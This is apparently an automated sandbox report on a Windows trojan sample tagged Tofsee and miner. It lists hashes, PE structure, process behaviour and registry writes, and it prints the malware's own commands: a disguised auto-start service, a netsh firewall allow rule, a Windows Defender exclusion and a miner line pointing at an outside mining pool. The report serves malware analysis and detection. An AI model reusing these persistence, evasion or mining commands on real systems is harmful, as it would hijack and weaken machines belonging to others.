General Info

File name

9acfb27a482a0ac42cd9caf72a24545c

Full analysis
https://app.any.run/tasks/bd199d60-136a-49cb-a45c-d392912a64cf
Verdict
Malicious activity
Analysis date
7/18/2019, 16:24:51
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

tofsee

trojan

miner

evasion

Indicators:

MIME:
application/x-dosexec
File info:
PE32 executable (GUI) Intel 80386, for MS Windows
MD5

9acfb27a482a0ac42cd9caf72a24545c

SHA1

b8c2d6639427c9343383ce21eff355974ea550a4

SHA256

5134552a33b485a25270b8b78068b22fb46ff20267f92f690ee31a2046b9297d

SSDEEP

6144:OqxxwoLIoklLgkgguVHkb/a3hftL4nzgvwZL:zldkl61VEb/a3BtL4nzgA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x86 en-US) (67.0.4)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Modifies exclusions in Windows Defender
  • svchost.exe (PID: 2640)
TOFSEE was detected
  • svchost.exe (PID: 2640)
Looks like application has launched a miner
  • svchost.exe (PID: 2640)
Uses SVCHOST.EXE for hidden code execution
  • svchost.exe (PID: 2640)
  • dcsovrw.exe (PID: 3824)
Application was dropped or rewritten from another process
  • dcsovrw.exe (PID: 3824)
MINER was detected
  • svchost.exe (PID: 2164)
Connects to CnC server
  • svchost.exe (PID: 2164)
Starts SC.EXE for service management
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
Uses NETSH.EXE for network configuration
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
Creates or modifies windows services
  • svchost.exe (PID: 2640)
Creates files in the Windows directory
  • svchost.exe (PID: 2640)
Application launched itself
  • svchost.exe (PID: 2640)
Starts CMD.EXE for commands execution
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
Checks for external IP
  • svchost.exe (PID: 2640)
Executable content was dropped or overwritten
  • 9acfb27a482a0ac42cd9caf72a24545c.exe (PID: 3496)
  • cmd.exe (PID: 3464)
Executed as Windows Service
  • dcsovrw.exe (PID: 3824)

No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.exe
|   Win32 Executable MS Visual C++ (generic) (42.2%)
.exe
|   Win64 Executable (generic) (37.3%)
.dll
|   Win32 Dynamic Link Library (generic) (8.8%)
.exe
|   Win32 Executable (generic) (6%)
.exe
|   Generic Win/DOS Executable (2.7%)
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2018:10:18 11:51:33+02:00
PEType:
PE32
LinkerVersion:
10
CodeSize:
266240
InitializedDataSize:
784896
UninitializedDataSize:
null
EntryPoint:
0x1efd2
OSVersion:
5.1
ImageVersion:
null
SubsystemVersion:
5.1
Subsystem:
Windows GUI
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:
18-Oct-2018 09:51:33
Detected languages
Arabic - Lebanon
Debug artifacts
C:\bixunabayimowixip duyucoxabiwafa-gaxuwo.pdb
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x000000F0
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
7
Time date stamp:
18-Oct-2018 09:51:33
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_EXECUTABLE_IMAGE
Sections
Name Virtual Address Virtual Size Raw Size Charateristics Entropy
.text 0x00001000 0x00040E26 0x00041000 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.26056
.rdata 0x00042000 0x00008577 0x00008600 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.98788
.data 0x0004B000 0x000AB164 0x00002600 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 1.97668
.idata 0x000F7000 0x00001BD4 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 3.78079
.vix 0x000F9000 0x00000A99 0x00000C00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 0
.rsrc 0x000FA000 0x000086CC 0x00008800 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.78742
.reloc 0x00103000 0x00001C37 0x00001E00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_DISCARDABLE,IMAGE_SCN_MEM_READ 4.5074
Resources
1

2

3

4

5

25

26

27

117

543

673

754

Imports
    KERNEL32.dll

Exports

Screenshots

Processes

Total processes
59
Monitored processes
12
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start 9acfb27a482a0ac42cd9caf72a24545c.exe wusa.exe no specs wusa.exe cmd.exe cmd.exe sc.exe sc.exe sc.exe dcsovrw.exe no specs #TOFSEE svchost.exe netsh.exe #MINER svchost.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3496
CMD
"C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe"
Path
C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\desktop\9acfb27a482a0ac42cd9caf72a24545c.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wusa.exe
c:\windows\system32\mpr.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
2072
CMD
"C:\Windows\System32\wusa.exe"
Path
C:\Windows\System32\wusa.exe
Indicators
No indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
MEDIUM
Exit code
3221226540
Version:
Company
Microsoft Corporation
Description
Windows Update Standalone Installer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wusa.exe
c:\systemroot\system32\ntdll.dll

PID
1984
CMD
"C:\Windows\System32\wusa.exe"
Path
C:\Windows\System32\wusa.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Update Standalone Installer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wusa.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\dpx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll

PID
1360
CMD
cmd /C mkdir C:\Windows\system32\kbexvctd\
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3464
CMD
cmd /C move /Y "C:\Users\admin\AppData\Local\Temp\dcsovrw.exe" C:\Windows\system32\kbexvctd\
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
700
CMD
sc create kbexvctd binPath= "C:\Windows\system32\kbexvctd\dcsovrw.exe /d\"C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe\"" type= own start= auto DisplayName= "wifi support"
Path
C:\Windows\system32\sc.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
A tool to aid in developing services for WindowsNT
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3000
CMD
sc description kbexvctd "wifi internet conection"
Path
C:\Windows\system32\sc.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
A tool to aid in developing services for WindowsNT
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3568
CMD
sc start kbexvctd
Path
C:\Windows\system32\sc.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation
Description
A tool to aid in developing services for WindowsNT
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3824
CMD
C:\Windows\system32\kbexvctd\dcsovrw.exe /d"C:\Users\admin\Desktop\9acfb27a482a0ac42cd9caf72a24545c.exe"
Path
C:\Windows\system32\kbexvctd\dcsovrw.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\windows\system32\kbexvctd\dcsovrw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll

PID
2640
CMD
svchost.exe
Path
C:\Windows\system32\svchost.exe
Indicators
Parent process
dcsovrw.exe
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Host Process for Windows Services
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\svchost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\secur32.dll
c:\windows\system32\upnp.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\ssdpapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\psapi.dll
c:\windows\system32\apphelp.dll

PID
3264
CMD
netsh advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\system32\svchost.exe" enable=yes>nul
Path
C:\Windows\system32\netsh.exe
Indicators
Parent process
9acfb27a482a0ac42cd9caf72a24545c.exe
User
admin
Integrity Level
HIGH
Exit code
1
Version:
Company
Microsoft Corporation
Description
Network Command Shell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\netsh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\rasmontr.dll
c:\windows\system32\mprapi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\mfc42u.dll
c:\windows\system32\odbc32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\odbcint.dll
c:\windows\system32\nshwfp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\slc.dll
c:\windows\system32\dhcpcmonitor.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpqec.dll
c:\windows\system32\qutil.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\wshelper.dll
c:\windows\system32\ws2help.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\nshhttp.dll
c:\windows\system32\httpapi.dll
c:\windows\system32\fwcfg.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\version.dll
c:\windows\system32\authfwcfg.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\winipsec.dll
c:\windows\system32\ifmon.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\nci.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\netiohlp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\whhelper.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\hnetmon.dll
c:\windows\system32\netshell.dll
c:\windows\system32\shell32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rpcnsh.dll
c:\windows\system32\dot3cfg.dll
c:\windows\system32\dot3api.dll
c:\windows\system32\atl.dll
c:\windows\system32\eappcfg.dll
c:\windows\system32\onex.dll
c:\windows\system32\eappprxy.dll
c:\windows\system32\napmontr.dll
c:\windows\system32\certcli.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nshipsec.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\activeds.dll
c:\windows\system32\adsldpc.dll
c:\windows\system32\polstore.dll
c:\windows\system32\nettrace.dll
c:\windows\system32\ndfapi.dll
c:\windows\system32\wdi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\tdh.dll
c:\windows\system32\wcnnetsh.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\p2pnetsh.dll
c:\windows\system32\p2p.dll
c:\windows\system32\p2pcollab.dll
c:\windows\system32\wlancfg.dll
c:\windows\system32\wlanhlp.dll
c:\windows\system32\wwancfg.dll
c:\windows\system32\wwapi.dll
c:\windows\system32\peerdistsh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\qagent.dll
c:\windows\system32\napipsec.dll
c:\windows\system32\tsgqec.dll
c:\windows\system32\eapqec.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\bcryptprimitives.dll

PID
2164
CMD
svchost.exe -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe
Path
C:\Windows\system32\svchost.exe
Indicators
Parent process
svchost.exe
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Host Process for Windows Services
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\svchost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\nsi.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll

Registry activity

Total events
159
Read events
94
Write events
65
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3496
9acfb27a482a0ac42cd9caf72a24545c.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3496
9acfb27a482a0ac42cd9caf72a24545c.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2640
svchost.exe
write
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\kbexvctd
ImagePath
C:\Windows\system32\kbexvctd\dcsovrw.exe
2640
svchost.exe
write
HKEY_USERS\.DEFAULT\Control Panel\Buses
Config0
2CF4523DDEAC3E0824EDB47D450DD49D084297DCE82E72BAA49F2BFDF87E4B1D6CB539B387CD945D24EDB47D470DD49D024195DAF71261ADC06D04FDA6E22673BBC9154961CDA56917DA864F7D38E5AE644490BDB57822ED965802CDF2B554758DF21D5904FCA66915D88345773FE29D084295D9E13F4BB4C06D06FDADFD542CDD9B4D0F30FFA168249EC60B1B79BDF0012DC58BB57E23EE925F0DCEC4E13B7E85C12B496DA0F15D15D9874A763FEDA8571DF459A44A1406C5C761FDC48D541CE4AD744A6BBFFF02579FC27D440DD49D642DF40218C09D98A46D34FDC741461EE4AD743C35F9A07313DB9A4C7435FAA4562DF4BD844D14DDA46D34FDC48D541DE4AD743D04CD945D24EDB47D440DD49D642DF4BD844D14DDA46D34FDC48D541DE4AD743DE0CC945D
2640
svchost.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
C:\Windows\system32\kbexvctd
0
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-100
DHCP Quarantine Enforcement Client
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-101
Provides DHCP based enforcement for NAP
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-103
1.0
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-102
Microsoft Corporation
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-1
IPsec Relying Party
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-2
Provides IPsec based enforcement for Network Access Protection
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-4
1.0
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-3
Microsoft Corporation
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\tsgqec.dll,-100
RD Gateway Quarantine Enforcement Client
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\tsgqec.dll,-101
Provides RD Gateway enforcement for NAP
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@%SystemRoot%\system32\tsgqec.dll,-102
1.0
3264
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
